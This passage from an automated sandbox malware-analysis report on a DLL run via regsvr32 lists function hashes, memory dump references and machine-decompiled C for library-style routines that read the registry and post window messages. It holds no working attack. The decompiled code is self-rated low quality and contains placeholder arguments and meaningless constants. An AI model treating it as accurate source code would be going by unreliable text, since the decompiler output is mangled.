                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Color
                                                                              • String ID: SysListView32
                                                                              • API String ID: 2811717613-78025650
                                                                              • Opcode ID: 8a8ffc3501179eb5402b1152d956c840cf40ce008884294503eb7f6445efa62c
                                                                              • Instruction ID: d568922b907bdb75c84d81bef0d303130f2cf84acef20a2a9a76e1fae19311a0
                                                                              • Opcode Fuzzy Hash: 8a8ffc3501179eb5402b1152d956c840cf40ce008884294503eb7f6445efa62c
                                                                              • Instruction Fuzzy Hash: 13010875611A80CAE781CF74E8107D936A0F748B68F08473ACA6D8B398EF7884858B20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10038040 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: GetOpenFileNameW
                                                                              • API String ID: 310444273-1384924626
                                                                              • Opcode ID: 3de707e5b0350ad1d6284166e0b528a74bd3da0adf34b4e12dd1340550e97395
                                                                              • Instruction ID: 2e2761941b070fe1d810e76aa78b2a08ef8a2af97266deefabed3606bccc18e2
                                                                              • Opcode Fuzzy Hash: 3de707e5b0350ad1d6284166e0b528a74bd3da0adf34b4e12dd1340550e97395
                                                                              • Instruction Fuzzy Hash: DDF0EC72202B85C9DB458F25DC8474873A4E758F9DF298025CA4C4A324EF74CDEAC741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100381A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: GetSaveFileNameW
                                                                              • API String ID: 310444273-611885661
                                                                              • Opcode ID: d2f984400207490e5da7fb496b5bd402bba56cd616bd4dc489e603734cf5c4e9
                                                                              • Instruction ID: c5a5e3dc910d534eed8b2ba3427bbc83857d52f34142badc0a93a74e60eb10b5
                                                                              • Opcode Fuzzy Hash: d2f984400207490e5da7fb496b5bd402bba56cd616bd4dc489e603734cf5c4e9
                                                                              • Instruction Fuzzy Hash: 76F0EC32202B45C9DB458F25ED8434833A8E758F9DF199026CE4D4A324EF74CDDAC341
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000B028 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_Destroy
                                                                              • API String ID: 310444273-3359732376
                                                                              • Opcode ID: 01b0c999543f55a2572d3c152cc666f21a9019b588d8e583e66d89909fc8d48a
                                                                              • Instruction ID: 3fffd64154a29ca1b8a0e13b13a2b4e5082454493f3a98ca03f51e11602fa846
                                                                              • Opcode Fuzzy Hash: 01b0c999543f55a2572d3c152cc666f21a9019b588d8e583e66d89909fc8d48a
                                                                              • Instruction Fuzzy Hash: 62F0E732302F8589EB458F25E89438833A4E748F9CF299025CA5D86328EF75C9E5C350
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000B18C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_LoadImageW
                                                                              • API String ID: 310444273-4008142716
                                                                              • Opcode ID: 96dddabb51dc1809a91ad538fec1b383fad06e2d8d083b7cc7913bf653e6827b
                                                                              • Instruction ID: a547bdc496929e3f3338203186570c2a5307d4eb19cb0d1b462657d2473eafef
                                                                              • Opcode Fuzzy Hash: 96dddabb51dc1809a91ad538fec1b383fad06e2d8d083b7cc7913bf653e6827b
                                                                              • Instruction Fuzzy Hash: CBF0E732202F8585EB458F25DC9438833A9E749F8CF698035CE4C8A328EF74C8EAC351
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10011400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,00040000,00000000,100121C1), ref: 1001141F
                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,00040000,00000000,100121C1), ref: 10011432
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00040000,00000000,100121C1), ref: 10011450
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: InitCommonControls
                                                                              • API String ID: 310444273-2489084829
                                                                              • Opcode ID: 282bf35dad2762a9f7cb74ace55b776480a2c1238a215b37c778b91684774606
                                                                              • Instruction ID: 969f16de07b4c1a645cd27890822a89135156255b1da34d181d9025799c40bbb
                                                                              • Opcode Fuzzy Hash: 282bf35dad2762a9f7cb74ace55b776480a2c1238a215b37c778b91684774606
                                                                              • Instruction Fuzzy Hash: CFF0E772202B85C6DF458F25ED8438833A4E748F8CF2A8125CA8C4A764EF74C8EAC741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001F4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_GetImageInfo
                                                                              • API String ID: 310444273-158344479
                                                                              • Opcode ID: 052c121dbd5488afc05eade992017fdd96bda71cc9f1812623775923a8239ec8
                                                                              • Instruction ID: 69b14f51d77bf96be8a3caa7fe1d1a4e61c6461c5173fa14d1d44993ae8fe862
                                                                              • Opcode Fuzzy Hash: 052c121dbd5488afc05eade992017fdd96bda71cc9f1812623775923a8239ec8
                                                                              • Instruction Fuzzy Hash: 52F0E732202F85C5DB458F25E88439833A5E759F9DF298439DA4C4A324EF74C9E5C350
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001150C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(?,?,00040000,00000000,1001217C), ref: 1001152B
                                                                              • LoadLibraryW.KERNEL32(?,?,00040000,00000000,1001217C), ref: 1001153E
                                                                              • GetProcAddress.KERNEL32(?,?,00040000,00000000,1001217C), ref: 1001155C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: InitCommonControlsEx
                                                                              • API String ID: 310444273-2357626986
                                                                              • Opcode ID: 6e9030213731fe778e3ad7ee5f1df488394685569454ea0335d78ceb08eecac6
                                                                              • Instruction ID: d0ef3b969eed6f2d9fa1c616657a9c8019802525f037ebf1207512518a80c991
                                                                              • Opcode Fuzzy Hash: 6e9030213731fe778e3ad7ee5f1df488394685569454ea0335d78ceb08eecac6
                                                                              • Instruction Fuzzy Hash: 21F0E772202F85C5DB458F25EC8438833B5E788F9CF2A8025CA4D4A324EF74C8E5C750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10032350 Relevance: 6.2, APIs: 4, Instructions: 154registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 40%
                                                                              			E10032350(void* __ebx, signed int __ecx, void* __edx, void* __rax, void* __rcx, long long* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, char _a4, signed long long _a8, long long _a16, char _a32, signed int _a8224, signed int _a8336) {
				unsigned int _v0;
				signed long long _v8;
				signed long long _v16;
				void* __rbx;
				void* __rdi;
				void* _t49;
				signed int _t52;
				signed int _t66;
				signed long long _t83;
				signed long long _t84;
				void* _t87;
				signed long long _t88;
				void* _t95;
				signed long long _t96;
				intOrPtr* _t118;
				void* _t120;
				long long* _t122;
				signed long long _t123;
				signed int _t124;
				void* _t125;
				char* _t134;
				signed long long _t138;
				void* _t139;

				_t128 = __r8;
				_t97 = __rcx;
				_t73 = __ecx;
				_t72 = __ebx;
				E100534D0(0x2068, __rax, __r10, __r11);
				_t126 = _t125 - __rax;
				_a16 = 0xfffffffe;
				_t83 =  *0x1006f4c8; // 0x6f13091946cb
				_t84 = _t83 ^ _t125 - __rax;
				_a8224 = _t84;
				_t140 = __r9;
				_t122 = __rdx;
				_t124 = _a8336;
				_a4 = 0;
				if( *((long long*)(__rcx + 0xa8)) == 0) {
					__eflags = _t124;
					_t130 =  !=  ? _t124 : 0x100577b8;
					__eflags =  !=  ? _t124 : 0x100577b8;
					_v8 =  *((intOrPtr*)(__rcx + 0xd0));
					_v16 = 0x1000;
					GetPrivateProfileStringW(??, ??, ??, ??, ??, ??);
					L10009D5C(__ebx,  *((intOrPtr*)(__rcx + 0xd0)), __rdx,  &_a32);
					L22:
					return E10038D20(_t73, _a8224 ^ _t126);
				}
				_t49 = E100320A4(__rcx, __r8);
				_t123 = _t84;
				if(_t84 != 0) {
					E10029130(_t49);
					_t138 = _t84;
					__eflags = _t84;
					_t73 = 0 | __eflags != 0x00000000;
					if(__eflags == 0) {
						_t73 = 0x80004005;
						E10009538(0x80004005, __edx, _t84, _t95, _t97, __r8, _t122, __r8, __r9, _t138);
						asm("int3");
					}
					_t87 =  *_t84;
					 *((intOrPtr*)(_t87 + 0x18))();
					_t9 = _t87 + 0x18; // 0x18
					_t96 = _t9;
					_a8 = _t96;
					_a4 = 0;
					_v0 = 0;
					_t88 =  &_v0;
					_v8 = _t88;
					_v16 = 0;
					r8d = 0;
					_t52 = RegQueryValueExW(??, ??, ??, ??, ??, ??);
					r12d = _t52;
					__eflags = _t52;
					if(_t52 != 0) {
						L14:
						RegCloseKey();
						__eflags = r12d;
						if(r12d != 0) {
							L10009D5C(_t72, _t88, _t122, _t124);
							_t36 = _t96 - 0x18; // 0x0
							_t118 = _t36;
							asm("lock xadd [edx+0x10], eax");
							__eflags = 0x1fffffffe;
							if(0x1fffffffe <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t118)) + 8))();
							}
						} else {
							_t31 = _t96 - 0x18; // 0x0
							E100095D8(_t31);
							 *_t122 = _t88 + 0x18;
							_t32 = _t139 - 1; // -1
							asm("lock xadd [ebx-0x8], eax");
							__eflags = _t32 + 0xffffffff;
							if(_t32 + 0xffffffff <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 - 0x18)))) + 8))();
							}
						}
						goto L22;
					} else {
						_t78 = _v0 >> 1;
						_t18 = _t88 + 1; // 0x1
						_t73 = _t18 -  *((intOrPtr*)(_t96 - 8));
						__eflags =  *((intOrPtr*)(_t96 - 0xc)) - (_v0 >> 0x00000001) | _t18 -  *((intOrPtr*)(_t96 - 8));
						if(( *((intOrPtr*)(_t96 - 0xc)) - (_v0 >> 0x00000001) | _t18 -  *((intOrPtr*)(_t96 - 8))) < 0) {
							E10009920(_t78,  &_a8, _t122, _t128);
							_t96 = _a8;
						}
						_t88 =  &_v0;
						_v8 = _t88;
						_v16 = _t96;
						_t134 =  &_a4;
						r8d = 0;
						_t120 = _t140;
						_t109 = _t123;
						r12d = RegQueryValueExW(??, ??, ??, ??, ??, ??);
						__eflags = _t96;
						if(_t96 != 0) {
							_t109 = _t96;
							_t66 = E10039820(_t65, _t96);
							__eflags = _t66;
							if(_t66 < 0) {
								goto L13;
							}
							goto L11;
						} else {
							_t66 = 0;
							L11:
							__eflags = _t66 -  *((intOrPtr*)(_t96 - 0xc));
							if(_t66 >  *((intOrPtr*)(_t96 - 0xc))) {
								L13:
								_t73 = 0x80070057;
								E10009538(0x80070057, _t78, _t88, _t96, _t109, _t120, _t122, _t128, _t134, _t138);
								asm("int3");
								goto L14;
							}
							 *(_t96 - 0x10) = _t66;
							 *((short*)(_t96 + _t88 * 2)) = 0;
							goto L14;
						}
					}
				}
				L10009D5C(__ebx, _t84, _t122, _t124);
				goto L22;
			}


























                                                                              0x10032350
                                                                              0x10032350
                                                                              0x10032350
                                                                              0x10032350
                                                                              0x1003235e
                                                                              0x10032363
                                                                              0x10032366
                                                                              0x1003236f
                                                                              0x10032376
                                                                              0x10032379
                                                                              0x10032381
                                                                              0x10032387
                                                                              0x1003238a
                                                                              0x10032392
                                                                              0x100323a2
                                                                              0x1003252e
                                                                              0x10032531
                                                                              0x10032531
                                                                              0x1003253c
                                                                              0x10032541
                                                                              0x10032554
                                                                              0x10032562
                                                                              0x1003256a
                                                                              0x10032589
                                                                              0x10032589
                                                                              0x100323ab
                                                                              0x100323b0
                                                                              0x100323b6
                                                                              0x100323cb
                                                                              0x100323d0
                                                                              0x100323d5
                                                                              0x100323d8
                                                                              0x100323dd
                                                                              0x100323df
                                                                              0x100323e4
                                                                              0x100323e9
                                                                              0x100323e9
                                                                              0x100323ea
                                                                              0x100323f0
                                                                              0x100323f3
                                                                              0x100323f3
                                                                              0x100323f7
                                                                              0x100323fc
                                                                              0x10032404
                                                                              0x1003240c
                                                                              0x10032411
                                                                              0x10032416
                                                                              0x10032424
                                                                              0x1003242d
                                                                              0x10032433
                                                                              0x10032436
                                                                              0x10032438
                                                                              0x100324b6
                                                                              0x100324b9
                                                                              0x100324bf
                                                                              0x100324c2
                                                                              0x100324fe
                                                                              0x10032504
                                                                              0x10032504
                                                                              0x1003250d
                                                                              0x10032515
                                                                              0x10032517
                                                                              0x1003251f
                                                                              0x1003251f
                                                                              0x100324c4
                                                                              0x100324c4
                                                                              0x100324c8
                                                                              0x100324d1
                                                                              0x100324d4
                                                                              0x100324d9
                                                                              0x100324e1
                                                                              0x100324e3
                                                                              0x100324f0
                                                                              0x100324f0
                                                                              0x100324f3
                                                                              0x00000000
                                                                              0x1003243a
                                                                              0x1003243e
                                                                              0x10032440
                                                                              0x10032443
                                                                              0x1003244b
                                                                              0x1003244d
                                                                              0x10032454
                                                                              0x10032459
                                                                              0x10032459
                                                                              0x1003245e
                                                                              0x10032463
                                                                              0x10032468
                                                                              0x1003246d
                                                                              0x10032472
                                                                              0x10032475
                                                                              0x10032478
                                                                              0x10032481
                                                                              0x10032484
                                                                              0x10032487
                                                                              0x1003248d
                                                                              0x10032490
                                                                              0x10032495
                                                                              0x10032497
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10032489
                                                                              0x10032489
                                                                              0x10032499
                                                                              0x10032499
                                                                              0x1003249c
                                                                              0x100324ab
                                                                              0x100324ab
                                                                              0x100324b0
                                                                              0x100324b5
                                                                              0x00000000
                                                                              0x100324b5
                                                                              0x1003249e
                                                                              0x100324a3
                                                                              0x00000000
                                                                              0x100324a3
                                                                              0x10032487
                                                                              0x10032438
                                                                              0x100323be
                                                                              0x00000000

                                                                              APIs
                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 10032554
                                                                                • Part of subcall function 100320A4: RegCreateKeyExW.ADVAPI32 ref: 10032105
                                                                                • Part of subcall function 100320A4: RegCloseKey.ADVAPI32 ref: 1003210E
                                                                              • RegQueryValueExW.ADVAPI32 ref: 1003242D
                                                                              • RegQueryValueExW.ADVAPI32 ref: 1003247B
                                                                              • RegCloseKey.ADVAPI32 ref: 100324B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$CreatePrivateProfileString
                                                                              • String ID:
                                                                              • API String ID: 1195603865-0
                                                                              • Opcode ID: e40987049cda8240a9e6ed292bb4ab06850de9c8b730840217f9c5ea74a5af16
                                                                              • Instruction ID: 6f8a0c563fb76362d768284bfb7406cb0371649d8e0f6b6513c3d92a96bbe1f7
                                                                              • Opcode Fuzzy Hash: e40987049cda8240a9e6ed292bb4ab06850de9c8b730840217f9c5ea74a5af16
                                                                              • Instruction Fuzzy Hash: A551AC36305B818AEB11CB25E85439E73A0FB88BE5F445121EE9A4B798EF3CC945CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100213F4 Relevance: 6.1, APIs: 4, Instructions: 123windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 52%
                                                                              			E100213F4(void* __ebx, void* __edx, void* __esi, intOrPtr* __rax, long long __rcx, long long __rdx, void* __rbp, long long __r8, long long _a8, long long _a16, long long _a24, char _a32) {
				char _v56;
				long long _v64;
				void* _v72;
				long long _v88;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* _t33;
				void* _t35;
				intOrPtr _t36;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t54;
				void* _t63;
				intOrPtr* _t64;
				intOrPtr* _t69;
				intOrPtr _t70;
				long long _t72;
				signed long long _t73;
				intOrPtr* _t76;
				char _t77;
				char _t79;
				intOrPtr _t94;
				intOrPtr* _t95;
				intOrPtr* _t97;
				long long _t98;
				long long _t99;
				void* _t100;
				intOrPtr _t106;
				long long _t108;
				intOrPtr* _t109;
				long long _t110;

				_t100 = __rbp;
				_t69 = __rax;
				_t63 = __esi;
				_t54 = __ebx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v64 = 0xfffffffe;
				_t98 = __r8;
				_t110 = __rdx;
				_t99 = __rcx;
				L10052DE0();
				_t79 = _v72;
				_t33 = GlobalLock(??);
				_t76 = __rax;
				E10029130(_t33);
				_t109 = _t69;
				_t64 = _t69;
				_t58 = 0 | _t64 == 0x00000000;
				if(_t64 == 0) {
					_t58 = 0x80004005;
					E10009538(0x80004005, __edx, _t69, _t76, _t79, __r8, __r8,  &_v56,  &_v72, _t109);
					asm("int3");
				}
				_t70 =  *_t69;
				_t35 =  *((intOrPtr*)(_t70 + 0x18))();
				_a32 = _t70 + 0x18;
				if(_t76 != 0) {
					_t36 = E10039820(_t35, _t76);
				} else {
					_t36 = 0;
				}
				r8d = _t36;
				_t93 = _t76;
				E10009CAC(_t54,  &_a32, _t76, _t99, _t100, _t110);
				GlobalUnlock(??);
				_t72 = _v72;
				_v88 = _t72;
				r9d = 0x8000;
				r8d = 0x3e4;
				L10052DDA();
				_t108 = _t72;
				_t106 =  *((intOrPtr*)(_t99 + 0x40));
				_t62 = 0x3e4;
				PostMessageW(??, ??, ??, ??);
				if(E10016184(_t99) != 0) {
					_t77 = _a32;
					if( *((intOrPtr*)(_t77 - 8)) > 1) {
						_t62 =  *((intOrPtr*)(_t77 - 0x10));
						E1000964C( *((intOrPtr*)(_t77 - 0x10)),  &_a32, _t93, _t106);
						_t77 = _a32;
					}
					E1000A57C(0x3e4, _t58, _t62, _t63, _t72, _t106, _t108, _t109);
					_t87 =  *((intOrPtr*)(_t72 + 8));
					_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 8))));
					_t94 = _t77;
					_t42 =  *((intOrPtr*)(_t73 + 0x140))();
					if(_t77 != 0) {
						_t87 = _t77;
						_t43 = E10039820(_t42, _t77);
						if(_t43 < 0) {
							goto L19;
						} else {
							goto L15;
						}
					} else {
						_t43 = 0;
						L15:
						if(_t43 >  *((intOrPtr*)(_t77 - 0xc))) {
							L19:
							_t44 = E10009538(0x80070057, _t62, _t73, _t77, _t87, _t94, _t98, _t106, _t108, _t109);
						} else {
							 *((intOrPtr*)(_t77 - 0x10)) = _t43;
							 *((short*)(_t77 + _t73 * 2)) = 0;
							_t95 = _t77 - 0x18;
							asm("lock xadd [edx+0x10], eax");
							if(0x1fffffffe <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t95)) + 8))();
							}
							_t44 = 0;
						}
					}
				} else {
					_t97 = _a32 + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					if(0x1fffffffe <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t97)) + 8))();
					}
					_t44 = 0;
				}
				return _t44;
			}





































                                                                              0x100213f4
                                                                              0x100213f4
                                                                              0x100213f4
                                                                              0x100213f4
                                                                              0x100213f4
                                                                              0x100213f9
                                                                              0x100213fe
                                                                              0x1002140c
                                                                              0x10021415
                                                                              0x10021418
                                                                              0x1002141b
                                                                              0x10021430
                                                                              0x10021435
                                                                              0x1002143a
                                                                              0x10021440
                                                                              0x10021443
                                                                              0x10021448
                                                                              0x1002144d
                                                                              0x10021450
                                                                              0x10021455
                                                                              0x10021457
                                                                              0x1002145c
                                                                              0x10021461
                                                                              0x10021461
                                                                              0x10021462
                                                                              0x10021468
                                                                              0x1002146f
                                                                              0x1002147a
                                                                              0x10021483
                                                                              0x1002147c
                                                                              0x1002147c
                                                                              0x1002147c
                                                                              0x10021488
                                                                              0x1002148b
                                                                              0x10021496
                                                                              0x100214a0
                                                                              0x100214c1
                                                                              0x100214c6
                                                                              0x100214d0
                                                                              0x100214d6
                                                                              0x100214df
                                                                              0x100214e4
                                                                              0x100214e7
                                                                              0x100214eb
                                                                              0x100214f0
                                                                              0x10021500
                                                                              0x1002152f
                                                                              0x1002153b
                                                                              0x1002153d
                                                                              0x10021548
                                                                              0x1002154d
                                                                              0x1002154d
                                                                              0x10021555
                                                                              0x1002155a
                                                                              0x1002155e
                                                                              0x10021561
                                                                              0x10021564
                                                                              0x1002156d
                                                                              0x10021573
                                                                              0x10021576
                                                                              0x1002157d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002156f
                                                                              0x1002156f
                                                                              0x1002157f
                                                                              0x10021582
                                                                              0x100215b1
                                                                              0x100215b6
                                                                              0x10021584
                                                                              0x10021584
                                                                              0x10021589
                                                                              0x1002158f
                                                                              0x10021598
                                                                              0x100215a2
                                                                              0x100215aa
                                                                              0x100215aa
                                                                              0x100215ad
                                                                              0x100215ad
                                                                              0x10021582
                                                                              0x10021502
                                                                              0x1002150a
                                                                              0x10021513
                                                                              0x1002151d
                                                                              0x10021525
                                                                              0x10021525
                                                                              0x10021528
                                                                              0x10021528
                                                                              0x100215c5

                                                                              APIs
                                                                              Memory Dump Source
